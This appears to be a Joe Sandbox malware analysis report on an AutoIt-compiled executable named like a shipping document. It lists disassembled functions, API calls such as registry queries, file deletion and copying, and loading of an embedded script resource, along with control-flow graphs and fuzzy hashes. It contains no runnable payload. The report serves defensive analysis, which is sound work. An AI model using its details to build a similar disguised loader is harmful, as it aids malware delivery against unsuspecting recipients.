                      • Part of subcall function 00E039E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00E03A15
                      • Part of subcall function 00E039E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00E03A36
                      • Part of subcall function 00E039E7: ShowWindow.USER32(00000000,?,?), ref: 00E03A4A
                      • Part of subcall function 00E039E7: ShowWindow.USER32(00000000,?,?), ref: 00E03A53
                      • Part of subcall function 00E043DB: _memset.LIBCMT ref: 00E04401
                      • Part of subcall function 00E043DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00E044A6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                    • String ID: This is a third-party compiled AutoIt script.$runas$%
                    • API String ID: 529118366-3343222573
                    • Opcode ID: dd3494cc8ce0dd652cace3de8f443e7acd0ac3b66bf4c88727138734b13fe567
                    • Instruction ID: 393b0cacefa01537e1b20f31e986dba114673069372bd8ae15e2b71837700a76
                    • Opcode Fuzzy Hash: dd3494cc8ce0dd652cace3de8f443e7acd0ac3b66bf4c88727138734b13fe567
                    • Instruction Fuzzy Hash: 28511971D08248AEDF15EBB5EC45EEEBBF8AB44304F106169F451B21F1CA7166CACB21
                    Function 00E04FE9 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 62COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 983 e04fe9-e05001 CreateStreamOnHGlobal 984 e05021-e05026 983->984 985 e05003-e0501a FindResourceExW 983->985 986 e05020 985->986 987 e3dc8c-e3dc9b LoadResource 985->987 986->984 987->986 988 e3dca1-e3dcaf SizeofResource 987->988 988->986 989 e3dcb5-e3dcc0 LockResource 988->989 989->986 990 e3dcc6-e3dcce 989->990 991 e3dcd2-e3dce4 990->991 991->986
                    APIs
                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00E04EEE,?,?,00000000,00000000), ref: 00E04FF9
                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00E04EEE,?,?,00000000,00000000), ref: 00E05010
                    • LoadResource.KERNEL32(?,00000000,?,?,00E04EEE,?,?,00000000,00000000,?,?,?,?,?,?,00E04F8F), ref: 00E3DC90
                    • SizeofResource.KERNEL32(?,00000000,?,?,00E04EEE,?,?,00000000,00000000,?,?,?,?,?,?,00E04F8F), ref: 00E3DCA5
                    • LockResource.KERNEL32(N,?,?,00E04EEE,?,?,00000000,00000000,?,?,?,?,?,?,00E04F8F,00000000), ref: 00E3DCB8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                    • String ID: SCRIPT$N
                    • API String ID: 3051347437-3852340653
                    • Opcode ID: 23d0d4d9fc85d007a88e5c5c9163b3530f5c752052f73dbc4a2e84fc40840b1d
                    • Instruction ID: 37680bc750811cbca45c18ae6e35880ae1d7a6d151d6527597419e499efebe6a
                    • Opcode Fuzzy Hash: 23d0d4d9fc85d007a88e5c5c9163b3530f5c752052f73dbc4a2e84fc40840b1d
                    • Instruction Fuzzy Hash: A5115A75200700AFD7258B66DC48F6B7BB9EBC9B11F204568F40AE62A0DB61EC44CA60
                    Function 00E04AFE Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1047 e04afe-e04b5e call e077c7 GetVersionExW call e07d2c 1052 e04b64 1047->1052 1053 e04c69-e04c6b 1047->1053 1054 e04b67-e04b6c 1052->1054 1055 e3dac0-e3dacc 1053->1055 1057 e04c70-e04c71 1054->1057 1058 e04b72 1054->1058 1056 e3dacd-e3dad1 1055->1056 1060 e3dad3 1056->1060 1061 e3dad4-e3dae0 1056->1061 1059 e04b73-e04baa call e07e8c call e07886 1057->1059 1058->1059 1069 e04bb0-e04bb1 1059->1069 1070 e3dbbd-e3dbc0 1059->1070 1060->1061 1061->1056 1063 e3dae2-e3dae7 1061->1063 1063->1054 1065 e3daed-e3daf4 1063->1065 1065->1055 1067 e3daf6 1065->1067 1071 e3dafb-e3dafe 1067->1071 1069->1071 1072 e04bb7-e04bc2 1069->1072 1073 e3dbc2 1070->1073 1074 e3dbd9-e3dbdd 1070->1074 1075 e04bf1-e04c08 GetCurrentProcess IsWow64Process 1071->1075 1076 e3db04-e3db22 1071->1076 1081 e3db43-e3db49 1072->1081 1082 e04bc8-e04bca 1072->1082 1083 e3dbc5 1073->1083 1077 e3dbc8-e3dbd1 1074->1077 1078 e3dbdf-e3dbe8 1074->1078 1079 e04c0a 1075->1079 1080 e04c0d-e04c1e 1075->1080 1076->1075 1084 e3db28-e3db2e 1076->1084 1077->1074 1078->1083 1087 e3dbea-e3dbed 1078->1087 1079->1080 1088 e04c20-e04c30 call e04c95 1080->1088 1089 e04c89-e04c93 GetSystemInfo 1080->1089 1085 e3db53-e3db59 1081->1085 1086 e3db4b-e3db4e 1081->1086 1090 e04bd0-e04bd3 1082->1090 1091 e3db5e-e3db6a 1082->1091 1083->1077 1092 e3db30-e3db33 1084->1092 1093 e3db38-e3db3e 1084->1093 1085->1075 1086->1075 1087->1077 1104 e04c32-e04c3f call e04c95 1088->1104 1105 e04c7d-e04c87 GetSystemInfo 1088->1105 1094 e04c56-e04c66 1089->1094 1098 e3db8a-e3db8d 1090->1098 1099 e04bd9-e04be8 1090->1099 1095 e3db74-e3db7a 1091->1095 1096 e3db6c-e3db6f 1091->1096 1092->1075 1093->1075 1095->1075 1096->1075 1098->1075 1103 e3db93-e3dba8 1098->1103 1100 e3db7f-e3db85 1099->1100 1101 e04bee 1099->1101 1100->1075 1101->1075 1106 e3dbb2-e3dbb8 1103->1106 1107 e3dbaa-e3dbad 1103->1107 1112 e04c41-e04c45 GetNativeSystemInfo 1104->1112 1113 e04c76-e04c7b 1104->1113 1108 e04c47-e04c4b 1105->1108 1106->1075 1107->1075 1108->1094 1111 e04c4d-e04c50 FreeLibrary 1108->1111 1111->1094 1112->1108 1113->1112
                    APIs
                    • GetVersionExW.KERNEL32(?), ref: 00E04B2B
                      • Part of subcall function 00E07D2C: _memmove.LIBCMT ref: 00E07D66
                    • GetCurrentProcess.KERNEL32(?,00E8FAEC,00000000,00000000,?), ref: 00E04BF8
                    • IsWow64Process.KERNEL32(00000000), ref: 00E04BFF
                    • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00E04C45
                    • FreeLibrary.KERNEL32(00000000), ref: 00E04C50
                    • GetSystemInfo.KERNEL32(00000000), ref: 00E04C81
                    • GetSystemInfo.KERNEL32(00000000), ref: 00E04C8D
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                    • String ID:
                    • API String ID: 1986165174-0
                    • Opcode ID: f49afeaad7d175afd1a6e5c05d8c88c5929cc3f5a27bb245790673cbf3188d96
                    • Instruction ID: 2864b5a9e28365207ae8fd6a0228bdf970a204c081c7cf07b7c03cebc509b687
                    • Opcode Fuzzy Hash: f49afeaad7d175afd1a6e5c05d8c88c5929cc3f5a27bb245790673cbf3188d96
                    • Instruction Fuzzy Hash: 0691F6B154E7C0DED731CB6895951AAFFE4AF25300F48599DD1CBB3A81D230E988C729
                    Function 00E0FE40 Relevance: 9.8, APIs: 3, Strings: 2, Instructions: 1040COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: BuffCharUpper
                    • String ID: pb$%
                    • API String ID: 3964851224-1798441486
                    • Opcode ID: 4f724afcca5220d3afc925e33e8d73b3f6c4f7f16d9f343d3cfdd1e4e509ce3e
                    • Instruction ID: 59f31e2439a7c3f6767496bf74f37e681c4c1b336492d951d3677e14983d1c29
                    • Opcode Fuzzy Hash: 4f724afcca5220d3afc925e33e8d73b3f6c4f7f16d9f343d3cfdd1e4e509ce3e
                    • Instruction Fuzzy Hash: 259270706083419FD724DF14C480BAAB7E1BF84304F14A96DF89AAB392D775EC85CB92
                    Function 00E0E800 Relevance: 7.4, Strings: 5, Instructions: 1102COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID:
                    • String ID: Dd$Dd$Dd$Dd$Variable must be of type 'Object'.
                    • API String ID: 0-2781164977
                    • Opcode ID: 7583e6378d9a53641f4abdd0229823f277951020b7fc869771082ecd0988eb1e
                    • Instruction ID: 8b0f2b20da40aa7462a5aa749247bb1db5d9a7ebc2b13bb39e4762beb23dae42
                    • Opcode Fuzzy Hash: 7583e6378d9a53641f4abdd0229823f277951020b7fc869771082ecd0988eb1e
                    • Instruction Fuzzy Hash: B5A28C75A00205CFCB24CF58C481AAEB7B1FF58314F649869E956BB392D731ED86CB90
                    Function 00E6449B Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                    Download Yara Rule
                    APIs
                    • GetFileAttributesW.KERNELBASE(?,00E3E6F1), ref: 00E644AB
                    • FindFirstFileW.KERNELBASE(?,?), ref: 00E644BC
                    • FindClose.KERNEL32(00000000), ref: 00E644CC
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: FileFind$AttributesCloseFirst
                    • String ID:
                    • API String ID: 48322524-0
                    • Opcode ID: 7fcbc5f754eb5cc986599f4f64a450cbb87c6a02824a56bf0b52694421190e51
                    • Instruction ID: ed8bb8285afab4ee2f07e502e92cd44b9ede8366a923c2e2b8becf2dcc89580a
                    • Opcode Fuzzy Hash: 7fcbc5f754eb5cc986599f4f64a450cbb87c6a02824a56bf0b52694421190e51
                    • Instruction Fuzzy Hash: 03E0DF728108006B8210A738FC0E8EA779CAF453B9F100726F939E20E0EB7499148696
                    Function 00E10B30 Relevance: 64.3, APIs: 27, Strings: 9, Instructions: 1300windowsleeptimeCOMMON
                    Download Yara Rule
                    APIs
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E10BBB
                    • timeGetTime.WINMM ref: 00E10E76
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E10FB3
                    • Sleep.KERNEL32(0000000A), ref: 00E10FC1
                    • LockWindowUpdate.USER32(00000000,?,?), ref: 00E1105A
                    • DestroyWindow.USER32 ref: 00E11066
                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E11080
                    • Sleep.KERNEL32(0000000A,?,?), ref: 00E451DC
                    • TranslateMessage.USER32(?), ref: 00E45FB9
                    • DispatchMessageW.USER32(?), ref: 00E45FC7
                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E45FDB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                    • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pb$pb$pb$pb
                    • API String ID: 4212290369-1420604165
                    • Opcode ID: 33714c22a13f93ca36db3004564f4c8119f0bba312e38c5c9897648deae4f2c7
                    • Instruction ID: b793ba53541194a10a9a8e78e3446596f5c1bbbf49e1c4e8fa31ed9e792f8529
                    • Opcode Fuzzy Hash: 33714c22a13f93ca36db3004564f4c8119f0bba312e38c5c9897648deae4f2c7
                    • Instruction Fuzzy Hash: 7CB2D271608741DFD728DF24D884BAAB7E5BF84304F14591DF49AB72A2CB71E885CB82
                    Function 00E691FE Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                      • Part of subcall function 00E69008: __time64.LIBCMT ref: 00E69012
                      • Part of subcall function 00E05045: _fseek.LIBCMT ref: 00E0505D
                    • __wsplitpath.LIBCMT ref: 00E692DD
                      • Part of subcall function 00E2426E: __wsplitpath_helper.LIBCMT ref: 00E242AE
                    • _wcscpy.LIBCMT ref: 00E692F0
                    • _wcscat.LIBCMT ref: 00E69303
                    • __wsplitpath.LIBCMT ref: 00E69328
                    • _wcscat.LIBCMT ref: 00E6933E
                    • _wcscat.LIBCMT ref: 00E69351
                      • Part of subcall function 00E6904E: _memmove.LIBCMT ref: 00E69087
                      • Part of subcall function 00E6904E: _memmove.LIBCMT ref: 00E69096
                    • _wcscmp.LIBCMT ref: 00E69298
                      • Part of subcall function 00E697DD: _wcscmp.LIBCMT ref: 00E698CD
                      • Part of subcall function 00E697DD: _wcscmp.LIBCMT ref: 00E698E0
                    • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00E694FB
                    • _wcsncpy.LIBCMT ref: 00E6956E
                    • DeleteFileW.KERNEL32(?,?), ref: 00E695A4
                    • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00E695BA
                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00E695CB
                    • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00E695DD
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                    • String ID:
                    • API String ID: 1500180987-0
                    • Opcode ID: 790f33e24c5688a2f6b63f96dd433d12afef7062fd7a956b0ed4d10e5895caeb
                    • Instruction ID: 72993518110b18bfdc3f901ada93bc0462a6af7b065bba0b4c179a02a50017d9
                    • Opcode Fuzzy Hash: 790f33e24c5688a2f6b63f96dd433d12afef7062fd7a956b0ed4d10e5895caeb
                    • Instruction Fuzzy Hash: 21C16CB2D40229AACF21DF95DC85ADEB7BDEF44350F0050AAF609F7151DB309A848F65
                    Function 00E03025 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 67windowregistryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • GetSysColorBrush.USER32(0000000F), ref: 00E03074
                    • RegisterClassExW.USER32(00000030), ref: 00E0309E
                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E030AF
                    • InitCommonControlsEx.COMCTL32(?), ref: 00E030CC
                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E030DC
                    • LoadIconW.USER32(000000A9), ref: 00E030F2
                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E03101
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                    • API String ID: 2914291525-1005189915
                    • Opcode ID: 9099d890c772a24efbe56af2908133905eee6c4fca0020ece348239c866e4b96
                    • Instruction ID: f9860b686652d4b566f844ce2ee3f702e20755dbc148f014f3152c2710571ba4
                    • Opcode Fuzzy Hash: 9099d890c772a24efbe56af2908133905eee6c4fca0020ece348239c866e4b96
                    • Instruction Fuzzy Hash: E33128B2851309AFDB408FA5E884ACDBBF4FB08310F10412AE554F62A0D7B6158ACF50
                    Function 00E03041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • GetSysColorBrush.USER32(0000000F), ref: 00E03074
                    • RegisterClassExW.USER32(00000030), ref: 00E0309E
                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E030AF
                    • InitCommonControlsEx.COMCTL32(?), ref: 00E030CC
                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E030DC
                    • LoadIconW.USER32(000000A9), ref: 00E030F2
                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E03101
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                    • API String ID: 2914291525-1005189915
                    • Opcode ID: a4a7dd29229ba6af95f4c73a987a004b39f39684df8fab6403146250970e78c6
                    • Instruction ID: 332379660f03ebb88da2d8e1a8173bc027910bc3f0f738bd0383d308bed45fac
                    • Opcode Fuzzy Hash: a4a7dd29229ba6af95f4c73a987a004b39f39684df8fab6403146250970e78c6
                    • Instruction Fuzzy Hash: 1721F7B2911308AFEB00DFA6EC49B9DBBF4FB08700F10412AF515B62A0D7B255898F91
                    Function 00E071EB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                      • Part of subcall function 00E04864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00EC52F8,?,00E037C0,?), ref: 00E04882
                      • Part of subcall function 00E2068B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00E072C5), ref: 00E206AD
                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00E07308
                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00E3EC21
                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00E3EC62
                    • RegCloseKey.ADVAPI32(?), ref: 00E3ECA0
                    • _wcscat.LIBCMT ref: 00E3ECF9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                    • API String ID: 2673923337-2727554177
                    • Opcode ID: 8e779ac78102485bbccb37ad1dc6b0f5720e4722f9c19e070d6fe61478915450
                    • Instruction ID: ac54f536d3f2b86b46e8d01b34329f994486b64c0f4cee026fa0012db3d7d3b4
                    • Opcode Fuzzy Hash: 8e779ac78102485bbccb37ad1dc6b0f5720e4722f9c19e070d6fe61478915450
                    • Instruction Fuzzy Hash: EC715C715093019ED708EF26E845D9BBBE8FF88340F40692EF445B72B1DB729989CB51
                    Function 00E03633 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151windowtimeregistryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 760 e03633-e03681 762 e036e1-e036e3 760->762 763 e03683-e03686 760->763 762->763 764 e036e5 762->764 765 e036e7 763->765 766 e03688-e0368f 763->766 767 e036ca-e036d2 DefWindowProcW 764->767 768 e036ed-e036f0 765->768 769 e3d24c-e3d27a call e111d0 call e111f3 765->769 770 e03695-e0369a 766->770 771 e0375d-e03765 PostQuitMessage 766->771 773 e036d8-e036de 767->773 775 e036f2-e036f3 768->775 776 e03715-e0373c SetTimer RegisterWindowMessageW 768->776 804 e3d27f-e3d286 769->804 777 e036a0-e036a2 770->777 778 e3d2bf-e3d2d3 call e6281f 770->778 774 e03711-e03713 771->774 774->773 781 e036f9-e0370c KillTimer call e044cb call e03114 775->781 782 e3d1ef-e3d1f2 775->782 776->774 783 e0373e-e03749 CreatePopupMenu 776->783 784 e03767-e03776 call e04531 777->784 785 e036a8-e036ad 777->785 778->774 796 e3d2d9 778->796 781->774 791 e3d1f4-e3d1f6 782->791 792 e3d228-e3d247 MoveWindow 782->792 783->774 784->774 786 e036b3-e036b8 785->786 787 e3d2a4-e3d2ab 785->787 794 e0374b-e0375b call e045df 786->794 795 e036be-e036c4 786->795 787->767 802 e3d2b1-e3d2ba call e57f5e 787->802 799 e3d217-e3d223 SetFocus 791->799 800 e3d1f8-e3d1fb 791->800 792->774 794->774 795->767 795->804 796->767 799->774 800->795 805 e3d201-e3d212 call e111d0 800->805 802->767 804->767 809 e3d28c-e3d29f call e044cb call e043db 804->809 805->774 809->767
                    APIs
                    • DefWindowProcW.USER32(?,?,?,?), ref: 00E036D2
                    • KillTimer.USER32(?,00000001), ref: 00E036FC
                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00E0371F
                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E0372A
                    • CreatePopupMenu.USER32 ref: 00E0373E
                    • PostQuitMessage.USER32(00000000), ref: 00E0375F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
